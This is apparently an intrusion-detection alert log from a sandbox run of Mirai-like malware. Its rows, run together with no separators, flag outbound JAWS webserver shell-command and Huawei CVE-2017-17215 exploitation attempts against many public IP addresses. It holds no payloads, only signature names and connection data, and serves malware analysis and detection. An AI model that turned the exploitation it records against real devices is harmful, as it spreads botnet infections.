                                                    2024-12-03T23:02:46.166588+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345734221.112.221.18580TCP
                                                    2024-12-03T23:02:46.182346+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339318150.77.11.3180TCP
                                                    2024-12-03T23:02:46.182346+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339318150.77.11.3180TCP
                                                    2024-12-03T23:02:46.182353+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360260218.156.44.13180TCP
                                                    2024-12-03T23:02:46.182353+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360260218.156.44.13180TCP
                                                    2024-12-03T23:02:46.182458+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23486385.170.20.8280TCP
                                                    2024-12-03T23:02:46.182458+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23486385.170.20.8280TCP
                                                    2024-12-03T23:02:46.182636+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349036195.23.137.12880TCP
                                                    2024-12-03T23:02:46.182636+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349036195.23.137.12880TCP
                                                    2024-12-03T23:02:46.182806+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23363545.197.2.5780TCP
                                                    2024-12-03T23:02:46.182806+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23363545.197.2.5780TCP
                                                    2024-12-03T23:02:46.197668+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349076171.114.61.17180TCP
                                                    2024-12-03T23:02:46.197668+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349076171.114.61.17180TCP
                                                    2024-12-03T23:02:46.198162+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355606187.63.41.17580TCP
                                                    2024-12-03T23:02:46.198162+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355606187.63.41.17580TCP
                                                    2024-12-03T23:02:46.198219+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345856180.176.144.19480TCP
                                                    2024-12-03T23:02:46.198219+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345856180.176.144.19480TCP
                                                    2024-12-03T23:02:46.229074+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233679650.132.187.19480TCP
                                                    2024-12-03T23:02:46.229074+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233679650.132.187.19480TCP
                                                    2024-12-03T23:02:46.229163+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234041639.50.202.10680TCP
                                                    2024-12-03T23:02:46.229163+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234041639.50.202.10680TCP
                                                    2024-12-03T23:02:46.238469+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337046119.65.57.17780TCP
                                                    2024-12-03T23:02:46.238469+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337046119.65.57.17780TCP
                                                    2024-12-03T23:02:46.238582+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233368880.230.160.12380TCP
                                                    2024-12-03T23:02:46.238582+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233368880.230.160.12380TCP
                                                    2024-12-03T23:02:46.238653+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340516122.193.77.23680TCP
                                                    2024-12-03T23:02:46.238653+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340516122.193.77.23680TCP
                                                    2024-12-03T23:02:46.238834+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235214498.124.81.22680TCP
                                                    2024-12-03T23:02:46.238834+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235214498.124.81.22680TCP
                                                    2024-12-03T23:02:46.244529+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233484068.151.41.22080TCP
                                                    2024-12-03T23:02:46.244529+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233484068.151.41.22080TCP
                                                    2024-12-03T23:02:46.244613+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360268168.193.104.17380TCP
                                                    2024-12-03T23:02:46.244613+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360268168.193.104.17380TCP
                                                    2024-12-03T23:02:46.244707+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356798104.163.127.22180TCP
                                                    2024-12-03T23:02:46.244707+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356798104.163.127.22180TCP
                                                    2024-12-03T23:02:46.244939+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233747820.8.82.25280TCP
                                                    2024-12-03T23:02:46.244939+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233747820.8.82.25280TCP
                                                    2024-12-03T23:02:46.253642+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234279614.210.195.11880TCP
                                                    2024-12-03T23:02:46.253642+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234279614.210.195.11880TCP
                                                    2024-12-03T23:02:46.253818+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359238181.220.26.3280TCP
                                                    2024-12-03T23:02:46.253818+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359238181.220.26.3280TCP
                                                    2024-12-03T23:02:46.253879+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23476701.3.136.20180TCP
                                                    2024-12-03T23:02:46.253879+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23476701.3.136.20180TCP
                                                    2024-12-03T23:02:46.253994+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355180156.26.199.23637215TCP
                                                    2024-12-03T23:02:46.254131+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345134161.233.72.25580TCP
                                                    2024-12-03T23:02:46.254131+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345134161.233.72.25580TCP
                                                    2024-12-03T23:02:46.254255+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336474204.240.163.13580TCP
                                                    2024-12-03T23:02:46.254255+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336474204.240.163.13580TCP
                                                    2024-12-03T23:02:46.254345+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359416165.11.16.7280TCP
                                                    2024-12-03T23:02:46.254345+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359416165.11.16.7280TCP
                                                    2024-12-03T23:02:46.254406+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233945812.132.132.23280TCP
                                                    2024-12-03T23:02:46.254406+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233945812.132.132.23280TCP
                                                    2024-12-03T23:02:46.254497+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333752200.159.220.2380TCP
                                                    2024-12-03T23:02:46.254497+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333752200.159.220.2380TCP
                                                    2024-12-03T23:02:46.254648+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233567225.127.18.4980TCP
                                                    2024-12-03T23:02:46.254648+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233567225.127.18.4980TCP
                                                    2024-12-03T23:02:46.254767+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338090113.46.88.24080TCP
                                                    2024-12-03T23:02:46.254767+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338090113.46.88.24080TCP
                                                    2024-12-03T23:02:46.260150+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235728041.150.177.6937215TCP
                                                    2024-12-03T23:02:46.285090+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349592130.68.95.12580TCP
                                                    2024-12-03T23:02:46.285090+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349592130.68.95.12580TCP
                                                    2024-12-03T23:02:46.285237+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342934131.29.112.21680TCP
                                                    2024-12-03T23:02:46.285237+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342934131.29.112.21680TCP
                                                    2024-12-03T23:02:46.285538+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355004156.136.92.13937215TCP
                                                    2024-12-03T23:02:46.510384+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358616197.192.56.4937215TCP
                                                    2024-12-03T23:02:46.527126+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334934197.57.140.2337215TCP
                                                    2024-12-03T23:02:46.535115+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333782156.60.180.10637215TCP
                                                    2024-12-03T23:02:47.260229+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360668210.51.145.2780TCP
                                                    2024-12-03T23:02:47.260229+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360668210.51.145.2780TCP
                                                    2024-12-03T23:02:47.275850+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345438149.64.159.20180TCP
                                                    2024-12-03T23:02:47.275850+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345438149.64.159.20180TCP
                                                    2024-12-03T23:02:47.291294+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234158699.199.126.17580TCP
                                                    2024-12-03T23:02:47.291294+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234158699.199.126.17580TCP
                                                    2024-12-03T23:02:47.322918+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235010659.191.121.4980TCP
                                                    2024-12-03T23:02:47.322918+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235010659.191.121.4980TCP
                                                    2024-12-03T23:02:47.331990+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233398493.251.103.3780TCP
                                                    2024-12-03T23:02:47.331990+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233398493.251.103.3780TCP
                                                    2024-12-03T23:02:47.332135+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234359066.238.208.2280TCP
                                                    2024-12-03T23:02:47.332135+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234359066.238.208.2280TCP
                                                    2024-12-03T23:02:47.332183+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353098201.80.204.17180TCP
                                                    2024-12-03T23:02:47.332183+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353098201.80.204.17180TCP
                                                    2024-12-03T23:02:47.347821+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346072188.77.166.6580TCP
                                                    2024-12-03T23:02:47.347821+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346072188.77.166.6580TCP
                                                    2024-12-03T23:02:47.347923+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341476198.92.160.22980TCP
                                                    2024-12-03T23:02:47.347923+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341476198.92.160.22980TCP
                                                    2024-12-03T23:02:47.488300+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338320160.20.120.880TCP
                                                    2024-12-03T23:02:47.488300+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338320160.20.120.880TCP
                                                    2024-12-03T23:02:48.354833+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233327887.158.2.23880TCP
                                                    2024-12-03T23:02:48.354833+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233327887.158.2.23880TCP
                                                    2024-12-03T23:02:48.378871+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233877245.124.116.5880TCP
                                                    2024-12-03T23:02:48.378871+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233877245.124.116.5880TCP
                                                    2024-12-03T23:02:48.394237+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235317299.159.215.10380TCP
                                                    2024-12-03T23:02:48.394237+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235317299.159.215.10380TCP
                                                    2024-12-03T23:02:48.410304+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351628192.222.27.10180TCP
                                                    2024-12-03T23:02:48.410304+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351628192.222.27.10180TCP
                                                    2024-12-03T23:02:48.441784+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233452689.150.199.16480TCP
                                                    2024-12-03T23:02:48.441784+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233452689.150.199.16480TCP
                                                    2024-12-03T23:02:48.603839+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350074104.166.6.13280TCP
                                                    2024-12-03T23:02:48.603839+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350074104.166.6.13280TCP
                                                    2024-12-03T23:02:48.644515+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233873892.192.221.13980TCP
                                                    2024-12-03T23:02:48.644515+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233873892.192.221.13980TCP
                                                    2024-12-03T23:02:48.650915+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343768163.251.100.2880TCP
                                                    2024-12-03T23:02:48.650915+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343768163.251.100.2880TCP
                                                    2024-12-03T23:02:48.650958+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234761660.191.55.2880TCP
                                                    2024-12-03T23:02:48.650958+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234761660.191.55.2880TCP
                                                    2024-12-03T23:02:48.660213+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23453462.74.167.13380TCP
                                                    2024-12-03T23:02:48.660213+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23453462.74.167.13380TCP
                                                    2024-12-03T23:02:48.660343+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235537093.231.170.13380TCP
                                                    2024-12-03T23:02:48.660343+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235537093.231.170.13380TCP
                                                    2024-12-03T23:02:48.894117+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234524441.44.228.13237215TCP
                                                    2024-12-03T23:02:49.760338+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336558197.182.209.21237215TCP
                                                    2024-12-03T23:02:49.760511+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341090197.19.209.24337215TCP
                                                    2024-12-03T23:02:49.760692+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233649641.179.221.22537215TCP
                                                    2024-12-03T23:02:49.760726+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235150641.91.72.2337215TCP
                                                    2024-12-03T23:02:49.760850+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359622156.209.190.24937215TCP
                                                    2024-12-03T23:02:49.760935+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234457241.22.58.21637215TCP
                                                    2024-12-03T23:02:49.775735+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233673841.42.182.21637215TCP
                                                    2024-12-03T23:02:49.785033+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357656156.229.43.237215TCP
                                                    2024-12-03T23:02:49.800711+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234696241.248.210.17737215TCP
                                                    2024-12-03T23:02:49.800936+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345004156.129.171.20837215TCP
                                                    2024-12-03T23:02:49.800990+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359120156.162.2.6937215TCP
                                                    2024-12-03T23:02:49.807075+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235560041.47.209.17137215TCP
                                                    2024-12-03T23:02:49.807139+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233730441.101.210.15437215TCP
                                                    2024-12-03T23:02:49.807246+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343634197.59.183.11837215TCP
                                                    2024-12-03T23:02:49.816266+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334380197.65.208.11237215TCP
                                                    2024-12-03T23:02:49.816381+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350668156.151.31.737215TCP
                                                    2024-12-03T23:02:49.816525+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355720156.130.182.3037215TCP
                                                    2024-12-03T23:02:49.816650+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360878197.82.8.11837215TCP
                                                    2024-12-03T23:02:49.816793+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234356641.38.17.23037215TCP
                                                    2024-12-03T23:02:49.816877+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233348041.128.181.8937215TCP
                                                    2024-12-03T23:02:49.816979+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234115641.82.34.11237215TCP
                                                    2024-12-03T23:02:49.831961+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234415241.124.213.6237215TCP
                                                    2024-12-03T23:02:49.847597+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339802197.136.205.4837215TCP
                                                    2024-12-03T23:02:49.957302+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356452197.245.12.9137215TCP
                                                    2024-12-03T23:02:49.957303+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337462156.94.202.16737215TCP
                                                    2024-12-03T23:02:49.957444+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353182197.248.140.5137215TCP
                                                    2024-12-03T23:02:50.525934+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356628197.24.9.4037215TCP
                                                    2024-12-03T23:02:50.566622+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.236058441.86.254.6737215TCP
                                                    2024-12-03T23:02:50.566655+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353356197.118.192.23037215TCP
                                                    2024-12-03T23:02:50.666450+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235425041.34.165.4437215TCP
                                                    2024-12-03T23:02:50.666550+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354534197.116.242.22537215TCP
                                                    2024-12-03T23:02:50.675793+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335154156.21.141.5937215TCP
                                                    2024-12-03T23:02:50.682156+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235248841.117.192.14537215TCP
                                                    2024-12-03T23:02:50.682269+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234987641.155.70.10737215TCP
                                                    2024-12-03T23:02:50.691483+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340948156.123.245.2137215TCP
                                                    2024-12-03T23:02:50.691542+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355786156.64.133.23437215TCP
                                                    2024-12-03T23:02:50.697630+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335826156.24.156.10437215TCP
                                                    2024-12-03T23:02:50.722806+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235502241.105.250.17737215TCP
                                                    2024-12-03T23:02:50.722901+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343558156.180.220.3737215TCP
                                                    2024-12-03T23:02:50.723036+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358828156.98.8.6237215TCP
                                                    2024-12-03T23:02:50.738880+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337734197.223.216.13437215TCP
                                                    2024-12-03T23:02:51.775946+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337804197.75.86.12537215TCP
                                                    2024-12-03T23:02:51.776013+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348140156.7.104.12337215TCP
                                                    2024-12-03T23:02:51.776137+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358710156.191.51.737215TCP
                                                    2024-12-03T23:02:51.791455+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347208156.87.179.6537215TCP
                                                    2024-12-03T23:02:51.807154+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343400197.62.121.8737215TCP
                                                    2024-12-03T23:02:51.807264+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233761641.211.62.10137215TCP
                                                    2024-12-03T23:02:51.816370+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354856156.148.188.12537215TCP
                                                    2024-12-03T23:02:51.816537+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333098197.151.70.3937215TCP
                                                    2024-12-03T23:02:51.819085+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349838186.65.123.23680TCP
                                                    2024-12-03T23:02:51.819085+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349838186.65.123.23680TCP
                                                    2024-12-03T23:02:51.822721+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360362197.216.168.5437215TCP
                                                    2024-12-03T23:02:51.822930+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235791441.45.89.8737215TCP
                                                    2024-12-03T23:02:51.823082+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349660197.243.101.1837215TCP
                                                    2024-12-03T23:02:51.832229+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353126156.92.24.25437215TCP
                                                    2024-12-03T23:02:51.832327+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354884197.12.146.9237215TCP
                                                    2024-12-03T23:02:51.863242+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235648841.231.90.9837215TCP
                                                    2024-12-03T23:02:51.886445+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352154197.202.161.3537215TCP
                                                    2024-12-03T23:02:52.550818+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234130866.253.65.11880TCP
                                                    2024-12-03T23:02:52.550818+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234130866.253.65.11880TCP
                                                    2024-12-03T23:02:52.557084+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346194197.230.10.11037215TCP
                                                    2024-12-03T23:02:52.582032+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351992174.66.171.12280TCP
                                                    2024-12-03T23:02:52.582032+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351992174.66.171.12280TCP
                                                    2024-12-03T23:02:52.582180+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348718197.234.69.6937215TCP
                                                    2024-12-03T23:02:52.604316+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352604197.31.233.22837215TCP
                                                    2024-12-03T23:02:52.651815+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344550184.137.226.7080TCP
                                                    2024-12-03T23:02:52.651815+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344550184.137.226.7080TCP
                                                    2024-12-03T23:02:52.660153+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356650210.204.159.19280TCP
                                                    2024-12-03T23:02:52.660153+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356650210.204.159.19280TCP
                                                    2024-12-03T23:02:52.669465+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348394223.73.112.21080TCP
                                                    2024-12-03T23:02:52.669465+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348394223.73.112.21080TCP
                                                    2024-12-03T23:02:52.669508+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348566197.30.46.4237215TCP
                                                    2024-12-03T23:02:52.676399+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233416673.77.117.5780TCP
                                                    2024-12-03T23:02:52.676399+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233416673.77.117.5780TCP
                                                    2024-12-03T23:02:52.676627+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356028173.14.136.4580TCP
                                                    2024-12-03T23:02:52.676627+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356028173.14.136.4580TCP
                                                    2024-12-03T23:02:52.676697+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343784181.201.168.3880TCP
                                                    2024-12-03T23:02:52.676697+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343784181.201.168.3880TCP
                                                    2024-12-03T23:02:52.676697+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352960116.23.243.380TCP
                                                    2024-12-03T23:02:52.676697+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352960116.23.243.380TCP
                                                    2024-12-03T23:02:52.697788+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235484841.139.101.22737215TCP
                                                    2024-12-03T23:02:52.707091+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233583243.202.19.5080TCP
